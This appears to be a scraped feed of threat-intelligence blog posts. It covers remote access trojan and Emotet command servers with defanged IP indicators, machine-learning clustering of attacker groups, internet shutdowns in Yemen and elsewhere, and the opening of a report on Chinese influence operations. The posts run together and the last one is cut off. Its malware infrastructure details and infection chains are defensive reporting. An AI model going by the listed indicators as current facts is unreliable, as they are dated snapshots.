  • Cafeini
  • NetBus
  • ProRAT
  • DarkComet
  • njRAT
  • Xtreme RAT
  • DarkTrack RAT
  • Nuclear RAT
  • ZeroAccess
  • Emotet
  • Orcus RAT

We then analyzed network communications for a subset of these controllers from victim organizations. Filtering was conducted to avoid identifying organizations that provide internet hosting services to other organizations as being directly victimized, and internet scanners were omitted where identifiable. This analysis is based upon the observation of connections made in a specific manner to servers identified as malicious, and the possibility exists that researchers or others that are not in fact victims have made such connections.

Active C2s

Breakdown of active C2s per malware family identified (total sample size of C2s detected: 481).

We focused our analysis on Emotet, Xtreme RAT, and ZeroAccess controllers to profile RAT communications with probable infected hosts within commercial organizations’ infrastructure.

Recorded Future’s Third-Party Risk Module

Following the launch of Recorded Future’s Third-Party Risk module, we have integrated additional features that will enable enterprises to assess cyber risk posed by companies in their supply chain, partners, and themselves. Third-Party Risk enables you to monitor your third-party ecosystem’s health, investigate risks posed by companies, and alert on changes in the threat environments of companies of interest to you. The analysis in this report was conducted using the same data sources we are using to inform third-party risk factors and metrics in our new module, especially our network traffic analysis risk rules.

Recorded Future Timeline

Global distribution of RAT C2s identified using Recorded Future and Shodan’s Malware Hunter project and the Feodo blocklist. (Source: Recorded Future)

Threat Analysis


Emotet is an advanced, modular banking trojan that primarily functions as a downloader or dropper of other banking trojans. Emotet was initially designed to steal financial data; however, it is now mostly used as a downloader for other malware such as Trickbot and Qakbot. Emotet uses C2 servers to receive updates as well as download and install any additional malware. Emotet operators tend to not be selective about targeting a specific industry or region, instead spreading without discretion, revealing that the malware operators appear more interested in large volumes of infection to generate profit.
Emotet was originally identified as a new banking trojan in 2014, and is often referred to as Geodo or Feodo. The malware was the product of natural evolution from the Feodo (sometimes called Cridex or Bugat) banking trojan, which spawned other offspring. In the past 12 months, however, it evolved from a standalone threat into a distributor of other trojans, with numerous large campaigns taking place over the summer of 2018. The malware is unique in that it employs a litany of open source libraries and code, enough to title a folder in its code directory as “Open Source.” A number of Emotet modules incorporate utilities developed by Nirsoft to scrape and gather passwords on the victim machine.

Emotet has recently been acting as a spam-sending malware that infects target systems to then load other malware families onto the host. The infected hosts that distribute spam and occasionally act as proxies for the C2 servers are a decentralized network, making it difficult for defenders to block at their perimeter.

Reporting has revealed that the operators of Emotet are likely maintaining at least two Emotet infrastructure setups in parallel, likely to aid redundancy and to make it harder for coordinated takedown by law enforcement.

Emotet: Evaluating Third-Party Risk Using Network Metadata

During our research, we identified 26 organizations with hosts infected with Emotet. These organizations were spread across a variety of industries, including:

  • Automotive
  • Finance and banking
  • Energy
  • Medical device manufacturing
  • Construction
  • Retail and entertainment
  • Logistics, commercial services, and supplies
  • IT
  • Utilities


The chart above shows us the breakdown of infected hosts communicating with identified Emotet controllers. Two controllers stand out, with over 40 infected hosts observed communicating with them: South Korean IP 115.88.75[.]245 and U.S. IP 192.155.90[.]90.


Emotet C2s identified with active corporate victim infections between December 2, 2018 and January 8, 2019.

The table above identifies the IP address, country, and internet service provider (ISP) of each Emotet C2 server analyzed in depth by Recorded Future.

Editor’s Note: ISPs provide internet access to customers, and may not be directly in control of the equipment and systems in use at any specific IP address within a netblock assigned to the ISP.

One of the most active Emotet C2s, based on number of unique corporate victims communicating with it in our research data, was South Korean IP 115.88.75[.]245. Based on our new algorithm that has been developed into a new risk rule for clients using the Recorded Future platform, IP addresses resolving to at least four different infected companies were detected communicating with the C2. Three of the infected companies were located in Latin America, which has recently experienced a surge in Emotet infections due to a slightly modified Emotet propagation methodology being employed. Two of the detected victims were financial companies in Mexico and Ecuador, with the third being a Chilean industrial conglomerate. The remaining corporate victim was a Canadian medical device manufacturing company.

The South Korean C2 IP did not have a domain resolving to it at the time of this research, but VirusTotal data indicates that connections with the IP address, explicitly noted as the host in the URL, were made to it from infected victims. We identified several malicious Microsoft Word documents containing obfuscated VBA2 code as macros designed to launch PowerShell, which in turn would retrieve and run an Emotet payload from the South Korean C2.

Emotet C2s

Clustering of Emotet C2s and communicating victim organizations detected using Recorded Future third-party risk analytics and network traffic analysis risk rules.

Further analysis of the Emotet C2s and the victim organization IPs revealed that there were several distinct groupings of activity as shown in the Maltego graph above. The highly active South Korean C2, detailed previously resolving to LG DACOM Corporation, sat within a highly interconnected cluster of activity shown on the left-hand side of the graph. This cluster centered on 17 detected Emotet C2s mostly hosted on infrastructure resolving to telecommunications service providers and hosting providers based in Latin America. The targeted organizations in the cluster of activity were based around the world, with a significant proportion of victim organizations based in Latin America and Europe.

Emotet Activity

Primary cluster of Emotet activity with the majority of C2s located in the Latin American IP space.

The second largest cluster of activity we observed centered on an Emotet controller hosted on Indian IP 45.123.3[.]54, which resolved to Blue Lotus Support Services in India. The C2 hostname pointing to this IP was[.]in, which corresponds to the Marian International Institute of Management, a university in Kerala, India. Our analysis revealed ongoing Emotet infections pertaining to this C2 at the following companies:

  • A Japanese machine manufacturer
  • A Chinese technology conglomerate
  • An Ecuadorian bank and a U.S. financial consulting firm
  • An Austrian energy supplier
  • Canadian and Australian cable TV providers

Xtreme RAT

Xtreme RAT is a commodity RAT that was first publicly sighted in 2010. The RAT is available for free and the source code for it has been leaked, enabling attackers to modify it freely to evade network defenses. Although it has been around for almost a decade and usage appears to be lower than previous years, it is still a potent trojan that has been widely reported as being used in targeted attacks and cybercrime activity. This RAT utilizes a client-server system that was defined by the author in a reverse of the usual scheme. The “server” part of the malware is installed on the victim’s computer, and the victim’s “server” thus connects with the “client,” which is in reality a controller operated on one or more remote C2 systems.

Recorded Future Heatmap

Recorded Future heatmap showing Xtreme RAT controllers active during the research period as detected using the Recorded Future and Shodan Malware Hunter project. (Source: Recorded Future)

Xtreme RAT: Evaluating Third-Party Risk Using Network Metadata

We deployed our new Third-Party Risk module to identify communication nodes with active Xtreme RAT controllers that we observed between December 8, 2018 and January 2, 2019. Once again, we found corporate IPs communicating with the Xtreme RAT controllers in a manner that indicated probable infection.

Xtreme RAT C2 IP Country Registrant/Organization
101.132.69[.]78 China Hangzhou Alibaba Advertising Co.,Ltd.
116.62.60[.]109 China Hangzhou Alibaba Advertising Co.,Ltd.
212.46.104[.]104 Germany HKN GmbH
196.200.160[.]201 Morocco CNRST (Centre National pour la Recherche Scientifique et Technique)
198.255.100[.]74 United States FDCServers
192.240.110[.]98 United States FDCServers

Three unique victims were found communicating with a Moroccan Xtreme RAT C2 hosted on 196.200.160[.]20,1 which resolved to hostname The IP is registered to the Centre National pour la Recherche Scientifique et Technique (CNRST), a technical university in Rabat, Morocco. Two of the infected victim devices resolved to infrastructure belonging to U.S. and Japanese multinational IT equipment and services companies. The third victim was a device located at a Brazilian university.

RAT Controller

Xtreme RAT controller hosted on a Moroccan university network.

Hostname test.zzjzpt[.]com was updated to point at Chinese IP 116.62.60[.]109 on December 16, 2018 and continued to resolve to that IP until at least January 5, 2019. In this time frame, the IP was designated as an Xtreme RAT C2. This controller, along with two other Xtreme RAT C2s hosted on U.S. FDCServer infrastructure (192.240.110[.]98 and 198.255.100[.]74), were observed receiving Xtreme RAT network communications from several infected hosts within an European utilities company. Additional victim organizations that were observed communicating with these Xtreme RAT C2s were:

  • A European video game company
  • Middle Eastern, South Asian, and East Asian telecommunications companies
  • An East Asian industrial conglomerate
  • An East Asian IT company

RAT Controllers

Xtreme RAT controllers with overlapping organizational targeting.

ZeroAccess Trojan

ZeroAccess was first discovered in 2011, and it utilizes an advanced rootkit to evade detection. As a trojan, it can create a hidden file system and backdoor on a host as well as facilitate the downloading of additional malware onto the host. ZeroAccess can be configured to make use of a domain generation algorithm (DGA) to discover and connect to its C2 servers and may also utilize peer-to-peer connectivity. Historically, ZeroAccess was deployed using strategic web compromises (SWC) and was typically used by cybercriminals in order to generate illicit funds through pay-per-click advertising mechanisms (click fraud). The malware has also been used to mine for cryptocurrency.

ZeroAccess: Evaluating Third-Party Risk Using Network Metadata

During our research period, we identified a single instance of a victim organization communicating with a ZeroAccess trojan C2 active on Romanian IP 31.5.229[.]224. The victim organization was an East Asian IT company.


Banking trojans like Emotet and other RATs continue to pose significant ongoing threats to government and company networks around the world. The developers behind Emotet continue to innovate and develop modularized functionality to aid propagation efficacy and evade traditional network defenses, resulting in widespread infection which according to a US-CERT alert issued in July 2018, have cost state, local, tribal, and territorial (SLTT) governments up to $1 million per incident to remediate.

This research highlights the benefit of being able to identify and track malicious RAT controller network infrastructure to inform the security posture of your enterprise. Clients can use Recorded Future’s Third-Party Risk module by observing related risk rules triggered within our platform. With Third-Party Risk, the same data we used to identify and analyze malware communications in this assessment trigger risk rules and raise an alert when a company in a client’s third-party risk watch list demonstrate similar activity.

Risk Rule

Third-party risk network traffic analysis risk rule showing high-severity risk associated with Xtreme RAT communications observed on a company’s infrastructure.

As we continue to develop additional coverage of RAT controllers, we will automatically add these signatures so they trigger third-party risk rules in the Recorded Future platform when we observe corporate network infrastructure communicating with these controllers.

Network Defense Recommendations

Recorded Future recommends organizations conduct proactive threat hunting and implement the following mitigations when defending against illicit RAT activity:

  • Use Recorded Future’s API to import indicators listed in this report (Appendix A) into your endpoint detection and response (EDR) platform.
  • Configure your intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defense mechanisms in place to alert on — and upon review, consider blocking illicit connection attempts from — the external IP addresses and domains listed in Appendix A.
  • Monitor endpoint traffic to alert and block connections to indicators in Appendix A.

To view a full list of the associated indicators of compromise, download the appendix.

1For more detail on the capability, please refer to the Recorded Future white paper on proactive threat identification.

2Visual Basic for Applications is an implementation of Microsoft’s Visual Basic 6 programming language and is used in Microsoft Office products, such as Excel, to develop macros.

The post Talking to RATs: Assessing Corporate Risk by Analyzing Remote Access Trojan Infections appeared first on Recorded Future.


Going ATOMIC: Clustering and Associating Attacker Activity at Scale

At FireEye, we work hard to detect, track, and stop attackers. As part of this work, we learn a great deal of information about how various attackers operate, including details about commonly used malware, infrastructure, delivery mechanisms, and other tools and techniques. This knowledge is built up over hundreds of investigations and thousands of hours of analysis each year. At the time of publication, we have 50 APT or FIN groups, each of which have distinct characteristics. We have also collected thousands of uncharacterized 'clusters' of related activity about which we have not yet made any formal attribution claims. While unattributed, these clusters are still useful in the sense that they allow us to group and track associated activity over time.

However, as the information we collect grows larger and larger, we realized we needed an algorithmic method to assist in analyzing this information at scale, to discover new potential overlaps and attributions. This blog post will outline the data we used to build the model, the algorithm we developed, and some of the challenges we hope to tackle in the future.

The Data

As we detect and uncover malicious activity, we group forensically-related artifacts into 'clusters'. These clusters indicate actions, infrastructure, and malware that are all part of an intrusion, campaign, or series of activities which have direct links. These are what we call our "UNC" or "uncategorized" groups. Over time, these clusters can grow, merge with other clusters, and potentially 'graduate' into named groups, such as APT33 or FIN7. This graduation occurs only when we understand enough about their operations in each phase of the attack lifecycle and have associated the activity with a state-aligned program or criminal operation.

For every group, we can generate a summary document that contains information broken out into sections such as infrastructure, malware files, communication methods, and other aspects. Figure 1 shows a fabricated example with the various 'topics' broken out. Within each 'topic' – such as 'Malware' – we have various 'terms', which have associated counts. These numbers indicate how often we have recorded a group using that 'term'.

Figure 1: Example group 'documents' demonstrating how data about groups is recorded

The Problem

Our end goal is always to merge a new group either into an existing group once the link can be proven, or to graduate it to its own group if we are confident it represents a new and distinct actor set. These clustering and attribution decisions have thus far been performed manually and require rigorous analysis and justification. However, as we collect increasingly more data about attacker activities, this manual analysis becomes a bottleneck. Clusters risk going unanalyzed, and potential associations and attributions could slip through the cracks. Thus, we now incorporate a machine learning-based model into our intelligence analysis to assist with discovery, analysis, and justification for these claims.

The model we developed began with the following goals:

  1. Create a single, interpretable similarity metric between groups
  2. Evaluate past analytical decisions
  3. Discover new potential matches

Figure 2: Example documents highlighting observed term overlaps between two groups

The Model

This model uses a document clustering approach, familiar in the data science realm and often explained in the context of grouping books or movies. Applying the approach to our structured documents about each group, we can evaluate similarities between groups at scale.

First, we decided to model each topic individually. This decision means that each topic will result in its own measure of similarity between groups, which will ultimately be aggregated to produce a holistic similarity measure.

Here is how we apply this to our documents.

Within each topic, every distinct term is transformed into a value using a method called term frequency -inverse document frequency, or TF-IDF. This transformation is applied to every unique term for every document + topic, and the basic intuition behind it is to:

  1. Increase importance of the term if it occurs often with the document.
  2. Decrease the importance of the term if it appears commonly across all documents.

This approach rewards distinctive terms such as custom malware families – which may appear for only a handful of groups – and down-weights common things such as 'spear-phishing', which appear for the vast majority of groups.

Figure 3 shows an example of TF-IDF being applied to a fictional "UNC599" for two terms: mal.sogu and mal.threebyte. These terms indicate the usages of SOGU and THREEBYTE within the 'malware' topic and thus we calculate their value within that topic using TF-IDF. The first (TF) value is how often those terms appeared as a fraction of all malware terms for the group. The second value (IDF) is the inverse of how frequently those terms appear across all groups. Additionally, we take the natural log of the IDF value, to smooth the effects of highly common terms – as you can see in the graph, when the value is close to 1 (very common terms), the log evaluates to near-zero, thus down-weighting the final TF x IDF value. Unique values have a much higher IDF, and thus result in higher values.

Figure 3: Breakdown of TF-IDF metric when evaluated for a single group in regard to malware

Once each term has been given a score, each group is now reflected as a collection of distinct topics, and each topic is a vector of scores for the terms it contains. Each vector can be conceived as an arrow, detailing the 'direction' that group is 'pointing'within that topic.

Within each topic space, we can then evaluate the similarity of various groups using another method – Cosine Similarity. If, like me, you did not love trigonometry – fear not! The intuition is simple. In essence, this is a measure of how parallel two vectors are. As seen in Figure 4, to evaluate two groups' usage of malware, we plot their malware vectors and see if they are pointing in the same direction. More parallel means they are more similar.

Figure 4: Simplified breakdown of Cosine Similarity metric when applied to two groups in the malware 'space'

One of the nice things about this approach is that large and small vectors are treated the same – thus, a new, relatively small UNC cluster pointing in the same direction as a well-documented APT group will still reflect a high level of similarity. This is one of the primary use cases we have, discovering new clusters of activity with high similarity to already established groups.

Using TF-IDF and Cosine Similarity, we can now calculate the topic-specific similarities for every group in our corpus of documents. The final step is to combine these topic similarities into a single, aggregate metric (Figure 5). This single metric allows us to quickly query our data for 'groups similar to X' or 'similarity between X and Y'. The question then becomes: What is the best way to build this final similarity?

Figure 5: Overall model flow diagram showing individual topic similarities and aggregation in to final similarity matrix

The simplest approach is to take an average, and at first that’s exactly what we did. However, as analysts, this approach did not sync well with analyst intuition. As analysts, we feel that some topics matter more than others. Malware and methodologies should be more important than say, server locations or target industries...right? However, when challenged to provide custom weightings for each topic, it was impossible to find an objective weighting system, free from analyst bias. Finally, we thought: "What if we used existing, known data to tell us what the right weights are?" In order to do that, we needed a lot of known – or "labeled" – examples of both similar and dissimilar groups.

Building a Labeled Dataset

At first our concept seemed straightforward: We would find a large dataset of labeled pairs, and then fit a regression model to accurately classify them. If successful, this model should give us the weights we wanted to discover.

Figure 6 shows some graphical intuition behind this approach. First, using a set of ‘labeled’ pairs, we fit a function which best predicts the data points.

Figure 6: Example Linear regression plot – in reality we used a Logistic Regression, but showing a linear model to demonstrate the intuition

Then, we use that same function to predict the aggregate similarity of un-labeled pairs (Figure 7).

Figure 7: Example of how we used the trained model to predict final similarity from individual topic similarities.

However, our data posed a unique problem in the sense that only a tiny fraction of all potential pairings had ever been analyzed. These analyses happened manually and sporadically, often the result of sudden new information from an investigation finally linking two groups together. As a labeled dataset, these pairs were woefully insufficient for any rigorous evaluation of the approach. We needed more labeled data.

Two of our data scientists suggested a clever approach: What if we created thousands of 'fake' clusters by randomly sampling from well-established APT groups? We could therefore label any two samples that came from the same group as definitely similar, and any two from separate groups as not similar (Figure 8). This gave us the ability to synthetically generate the labeled dataset we desperately needed. Then, using a linear regression model, we were able to elegantly solve this 'weighted average' problem rather than depend on subjective guesses.

Figure 8: Example similarity testing with 'fake' clusters derived from known APT groups

Additionally, these synthetically created clusters gave us a dataset upon which to test various iterations of the model. What if we remove a topic? What if we change the way we capture terms? Using a large labeled dataset, we can now benchmark and evaluate performance as we update and improve the model.

To evaluate the model, we observe several metrics:

  • Recall for synthetic clusters we know come from the same original group – how many do we get right/wrong? This evaluates the accuracy of a given approach.
  • For individual topics, the 'spread' between the calculated similarity of related and unrelated clusters. This helps us identify which topics help separate the classes best.
  • The accuracy of a trained regression model, as a proxy for the 'signal' between similar and dissimilar clusters, as represented by the topics. This can help us identify overfitting issues as well.

Operational Use

In our daily operations, this model serves to augment and assist our intelligence experts. Presenting objective similarities, it can challenge biases and introduce new lines of investigation not previously considered. When dealing with thousands of clusters and new ones added every day from analysts around the globe, even the most seasoned and aware intel analyst could be excused for missing a potential lead. However, our model is able to present probable merges and similarities to analysts on demand, and thus can assist them in discovery.

Upon deploying this to our systems in December 2018, we immediately found benefits. One example is outlined in this blog post about potentially destructive attacks. Since then we have been able to inform, discover, or justify dozens of other merges.

Future Work

Like all models, this one has its weaknesses and we are already working on improvements. There is label noise in the way we manually enter information from investigations. There is sometimes 'extraneous' data about attackers that is not (yet) represented in our documents. Most of all, we have not yet fully incorporated the 'time of activity' and instead rely on 'time of recording'. This introduces a lag in our representation, which makes time-based analysis difficult. What an attacker has done lately should likely mean more than what they did five years ago.

Taking this objective approach and building the model has not only improved our intel operations, but also highlighted data requirements for future modeling efforts. As we have seen in other domains, building a machine learning model on top of forensic data can quickly highlight potential improvements to data modeling, storage, and access. Further information on this model can also be viewed in this video, from a presentation at the 2018 CAMLIS conference.

We have thus far enjoyed taking this approach to augmenting our intelligence model and are excited about the potential paths forward. Most of all, we look forward to the modeling efforts that help us profile, attribute, and stop attackers.

Yemeni War Emphasizes Importance of Internet Control in Statecraft and Conflict

Insikt Group

Click here to download the complete analysis as a PDF.

This report serves as a follow up to Recorded Future’s previous work, “Underlying Dimensions of Yemen’s Civil War: Control of the Internet.” It is intended to provide an update on previous reporting, as well as explore the trend of government-mandated internet shutdowns and access control.

Sources of this research include the Recorded Future® Platform, findings and methods from the Citizen Lab, Shodan, VirusTotal, Censys, GreyNoise, DomainTools, ReversingLabs, and third-party metadata. Recorded Future would like to thank the Citizen Lab, AccessNow, NetBlocks, Oracle/Dyn, and Freedom House for their continued reporting on internet outages, access restrictions, and censorship.

Executive Summary

Despite attempted peace talks in early December 2018, the conflict in Yemen has continued to claim lives. The World Health Organization declared the country in crisis after a rampant cholera outbreak that plunged the Arabian nation into a humanitarian disaster centered around an epidemic, a famine, and a civil war. A truce in the port town of Al-Hudaydah has not yet been broken, and may provide an avenue to deliver humanitarian aid to the country on the brink of starvation. Today, the grain stores held by the World Food Bank there are currently inaccessible, and may rot before a withdrawal is brokered.

As a result of continued airstrike activity, armed skirmishes among Yemeni factions, and the general degradation of Yemen’s infrastructure and public health, the small amount of internet infrastructure in Yemen remains diminished. Despite indications of low usage, Recorded Future has observed an increase in the deployment of network control devices on YemenNet, the ISP controlled by Houthi forces. Recorded Future did not observe substantive changes on the Yemen top-level domain (TLD) space, or on either major internet service provider in Yemen.

Internet access control has become a growing trend, as internet disruptions, restrictions of information control, and other censorship methods have been increasing globally. Within Yemen, factions vie for control of internet infrastructure and use clever threat vectors in a few ways to control information entering and leaving their territories. The severing of or restrictions on internet use has become a norm in a wider trend of internet restrictions or blackout activity. India, Venezuela, Bangladesh, and Sudan have used diverse methods of controlling the internet access of their citizens.

Threat Analysis

Amid the fighting and the humanitarian disaster, international players still make attempts to leverage the horrible situation for positive headlines, or to maintain influence in Yemen. The United States stated that a January 6, 2019 drone strike against a known member of al-Qaeda in the Arabian Peninsula “delivered justice” in reprisal for the al-Qaeda bombing of the USS Cole in the Gulf of Aden in the year 2000. Saudi Arabian-backed missile strikes against the Houthi-held capital, Sana’a, continue to claim civilian lives despite being “targeted military strikes.”

In February 2019, CNN published a report detailing how U.S.-made weapon systems originally sold to Saudi Arabia and the United Arab Emirates have allegedly reached the hands of al-Qaeda members and Houthi militias, including armored Mine-Resistant Ambush Protected (MRAP) vehicles. The Houthis, with the inadvertent aid of U.S. vehicles and weapons, have not only eclipsed a well-organized militia and become a more potent force, but have also become more capable of censorship and surveillance.

Recorded Future, via Shodan searches, identified the deployment of two additional Netsweeper devices on YemenNet on two IP addresses: and The device identified on was still up at the time of this analysis. The re-emergence of censorship devices on the Houthi-controlled network may be a sign of momentary stability in Yemen’s conflict, as operators may now have the time and safety to make the devices operational. Houthi forces have previously breached WhatsApp groups, and local contacts indicate that the group continues to have access to private chats, likely via individual mobile compromise or by enticing individuals to provide them data.

Recorded Future could not confirm the ongoing censorship of traffic in Yemen due to Netsweeper installations, which is likely a combination of low volumes of traffic in Yemen as well as a lack of monitoring capability and visibility within YemenNet. Rapid7’s National Exposure Index found that although Yemeni ASNs have allocated 135,168 IP addresses, only 17,934 addresses were assigned, indicating low usage.

Recorded Future has not observed the widespread adoption of AdenNet in the country yet, which may be related to the fact that the Hadi government, which implemented the ISP, still resides largely in Saudi Arabia, and not in Aden. General internet usage appears low in Yemen, as GreyNoise data found only 538 total hosts observed in the country, which is a low number of hosts in a country of Yemen’s size and IP allocation. Comparatively, Shodan detected a total of 44,451 devices in the country, but no data indicates that they are being used.

DomainTools data indicates that there are now 1,184 .ye domains (Yemen’s TLD) — a minor increase of 32 domain purchases. Recorded Future did not observe any of these domain registrations. The TLD remains under the administration of the Houthis and YemenNet. This control of the TLD allows the Houthis to pose themselves as the legitimate administrators of Yemen to the outside internet.

Emerging Internet Disruption Activity Globally

The severing of undersea cables and other efforts to control Yemen’s internet have not taken place in a vacuum, but rather have become a troubling trend globally, predominantly in Africa. Internet disruptions, information control, and other censorship methods have been increasing globally, according to a number of watchdog and non-profit organizations. Recent reporting has found that censorship of HTTP traffic, VPN blockages, and censorship of emojis happens in various nations. Of note, Venezuela, India, Bangladesh, and Sudan have used diverse methods of manipulating the internet access of their citizens.

Recorded Future Timeline

Timeline of internet outages in 2019. (Source: Recorded Future)

These countries pose interest to multinational corporations for a number of reasons. Venezuela is a player in the international oil market, and the political situation there continues to destabilize international access to the country. Bangladesh is particularly interesting to retail companies, as a large proportion of the garment supply chain can be found in the the country. Finally, Sudan — and other African nations with lower rates of internet penetration — has been more inclined to shut down the internet in various ways and provide customers with interesting case studies in potential human rights abuses.


Venezuela has been immersed in political discontent driven by hyperinflation and shortages of food and medicine, heightened by power grabs, electrical instability, and internet outages. Rival factions have vied for power and control of Venezuela, with groups attempting to control internet and information access within the country. This has included small-scale, targeted DNS manipulation within Venezuela, country-wide blocking of streaming services, and total blackouts of any internet access.

Regional blackouts and country-wide internet disruptions have been reported in Venezuela since January 2019. NetBlocks has also reported on social media and information website blackouts inside of the country in relation to the disputed presidency and ongoing economic turmoil. NetBlocks further found an outage of YouTube, Periscope, and other streaming platforms during a speech from the interim president on January 27, 2019.

In February 2019, Kaspersky Lab found evidence of DNS manipulation within Venezuela. The attackers modified the DNS records of a legitimate volunteering website to a potentially malicious IP address in Venezuela which also hosted a malicious domain. This directed users inside of Venezuela to the malicious infrastructure while the rest of the globe was routed to the expected infrastructure. This activity is believed to be used to target and phish Venezuelan citizens who support interim president, Juan Guaidó, according to findings from Motherboard.


On January 2, 2019, Bangladesh ordered a national-level throttling of all mobile data services in the country, ahead of its national election. Bangladesh chose to limit mobile data access, as 93 percent of the country’s internet connections come from mobile phones, according to the Bangladesh Telecommunication Regulatory Commission. Recorded Future believes that these efforts are likely attempts to quell social unrest within the country to prevent the spread of information regarding the country’s numerous accusations of human rights abuses.

The shutdowns appear to have the dual purpose of limiting communication within the country, as well as preventing the spread of evidence of atrocities within the country to the outside world. This appears to be similar to activity that Recorded Future observed in Yemen — with control of the internet infrastructure and Yemen TLD space, Houthi forces attempted to characterize Yemen as a Houthi country to the world outside. Recorded Future suspects that the Bangladeshi government may be attempting to control the external narrative of the country’s internal affairs in a similar manner as exercised in Yemen.


India led the globe in 2018 in a number of internet disruptions and outages, with 134 reported incidents. The internet is so often disrupted in India that a service has been stood up to track the activity. The lack of connectivity in the country is not due to strained providers or insufficient infrastructure, but due to erratic, and sometimes unexplained government orders to fixed-line and wireless providers to revoke access. The incidents are described as “government-imposed disablement of access to the internet as a whole within one or more localities for any duration of time.” The regularity of the activity is troubling, as is the scale of how much internet access is restricted or severed.

The majority of the shutdowns targeted mobile providers and have come from the northwest corner of the country, which borders regional rival Pakistan, including Punjab and Kashmir. The majority of shutdowns have come in response to reports of militant activity, and to quell potential rumors of further activity. Often, activity is degraded to 2G speeds, or entirely cut off, according to the Freedom House’s 2018 report on internet freedoms in India. The report found that government officials often cite “precautionary measures” when ordering internet and cellular providers to reduce or shutdown access. Recorded Future anticipates that internet shutdowns in the border area will increase in scope and magnitude in the near term due to heightened tensions between Pakistan and India.

India’s internet control differs from the others in scope, frequency, and methodology. India is a democracy, limiting internet access in minority regions to counterterrorism and militant activity. Typically, internet censorship and access control are associated with authoritarian regimes or developing nations, where India is a democracy and maintains the world’s sixth largest gross domestic product value (GDP), a measure used to determine relative economic size. Researchers from Montclair State University estimated that the 59 internet blackouts in the border region in 2017 alone cost India nearly half a billion dollars in GDP.

Freedom House also published an annual report on global trends, which made note of countries globally purchasing Chinese telecommunications infrastructure, India being among those countries. Yemen, notably, has also purchased a large amount of equipment from Chinese telecommunication company Huawei. Alongside this infrastructure was the deployment of Netsweeper content filtering devices. Using Shodan, Recorded Future identified eight Netsweeper instances in the country, and found that five of those devices were signed with Huawei SSL certificates. Recorded Future could not confirm the ongoing censorship of traffic in India from the Netsweeper devices.


Digital rights non-profits AccessNow and Netblocks reported a countrywide outage of access to Twitter, Facebook, Instagram, and WhatsApp across Sudan in December 2018. The blocking of those applications came amid protests following a 70 percent inflation and a spike of grain and oil prices in the country. Sudan’s regime has responded harshly to the nationwide protests, cracking down on civilians with riot police using tear gas and live ammunition, killing dozens of protestors. Internet access was depreciated across the country, limiting access to the aforementioned applications to prevent “rumor mongering.”

This censorship showed a coordinated effort across multiple ISPs to block access to social media and communication applications. Sudanese telecommunication providers Zain-SDN, Sudatel, and Kanartel were affected by the blackout, as was international telecom MTN, which reportedly did not block WhatsApp. This is likely indicative of the regime leaning on the internet service providers to facilitate an effective media blackout. Members of Anonymous encouraged Sudanese residents to use TOR or a VPN on their mobile devices to bypass the blockade, but there was no indication of whether this method effectively evaded the ISP blackout.

Methods of Internet Control in Statecraft and Conflict

These recent acts of censorship and internet shutdowns reflect different methods of internet access control regimes and rebel groups having to control information access. The more blunt methods generally lead to internet blackouts at large, as exhibited by Yemen when Houthi forces severed internet cables, as well as more brutish blackouts used by Bangladesh and Zimbabwe this year, subjecting citizens to total internet outages.

Countrywide censorship is also possible at the routing level, but is not always easily implemented. Russia made a failed attempt at blocking encrypted messaging application Telegram at the protocol level, and eventually blocked entire subnets belonging to Google and Amazon, which had widespread negative impacts on the country’s internet. Turkey has used rough DNS hijacking against Google DNS and OpenDNS in 2014 to curtail the country’s use of Twitter and other social media platforms. Iran has imposed content blackouts by using BGP hijacking to sinkhole media traffic, among other methods, including HTTP host–based blocking, keyword filtering, and protocol-based throttling.

Content-level censorship can be used in countries with large control of their IP and DNS infrastructure, as previously noted by Yemen’s use of Netsweeper devices. The Citizen Lab has previously conducted research on these censorship devices, while new reports have found countries using technology capable of deep packet inspection for content monitoring in the Middle East.


Censorship at these levels is not limited to the countries above, but internet control has become a tool being used more and more by countries as part of their statecraft. Government censorship is not a new trend, but outside parties are increasingly reporting on such incidents. States that implement such measures take a risk — they may maintain control over their populations, but these actions will also likely be detrimental to their domestic economies and stifle business opportunities. Countries that implement digital censorship tend to slow their own technological growth and business innovation.

These internet shutdowns can create heightened risk for the entire region they are affecting. Additionally, beyond the social costs, censorship and shutdowns can severely hamper economic growth and trade. Many businesses that operate online or rely on cellular service can incur heavy losses and can limit production in certain states. Corporations operating in those countries can lose control of their operations which can lead to tampering, or effectively have workers feel stranded without contact from their main headquarters.

The post Yemeni War Emphasizes Importance of Internet Control in Statecraft and Conflict appeared first on Recorded Future.


Beyond Hybrid War: How China Exploits Social Media to Sway American Opinion

Insikt Group

Click here to download the complete analysis as a PDF.

Recorded Future analyzed data from several Western social media platforms from October 1, 2018 through February 22, 2019 to determine how the Chinese state exploits social media to influence the American public. This report details those techniques and campaigns using data acquired from Recorded Future® Platform, social media sites, and other OSINT techniques. This report will be of most value to government departments, geopolitical scholars and researchers, and all users of social media.

Executive Summary

Since the 2016 U.S. presidential election, researchers, reporters, and academics have devoted countless resources to understanding the role that Russian disinformation, or influence operations, played in the outcome of the election. As a result, there exists an implicit assumption that other state-run influence campaigns must look the same and operate in the same manner.

However, our research demonstrates that social media influence campaigns are not a one-size-fits-all technique. We studied Chinese state-run social media influence operations and concluded that the Chinese state utilized techniques different from the Russian state. These differences in technique are driven by dissimilar foreign policy and strategic goals. President Xi Jinping has global strategic goals for China different from those President Vladimir Putin has for Russia; as a result, the social media influence techniques used by China are different from those used by Russia.

Further, our research has revealed that the manner in which China has attempted to influence the American population is different from the techniques they use domestically. We believe that the Chinese state has employed a plethora of state-run media to exploit the openness of American democratic society in an effort to insert an intentionally distorted and biased narrative portraying a utopian view of the Chinese government and party.

Key Judgments

  • Chinese English-language social media influence operations are seeded by state-run media, which overwhelmingly present a positive, benign, and cooperative image of China.
  • Chinese influence accounts used paid advertisements to target American users with political or nationally important messages and distorted general news about China.
  • It is likely that weekly guidance issued by state propaganda authorities drives accounts to propagate positive messages in concert regarding special events once or twice a month.
  • We assess that these Chinese state-run influence accounts did not attempt a large-scale campaign to influence American voters in the run-up to the November 6, 2018, midterm elections. However, on a small scale, we observed all of our researched state-run influence accounts disseminating breaking news and biased content surrounding President Trump and China-related issues.
  • We believe that Russian social media influence operations are disruptive and destabilizing because those techniques support Russia’s primary strategic goal. Conversely, China’s state-run social media operations are largely positive and coordinated because those techniques support Chinese strategic goals.



In January 2017, the U.S. Intelligence Community published a seminal unclassified assessment on Russian efforts to influence the 2016 U.S. presidential election. One of the key judgments in this assessment concluded:

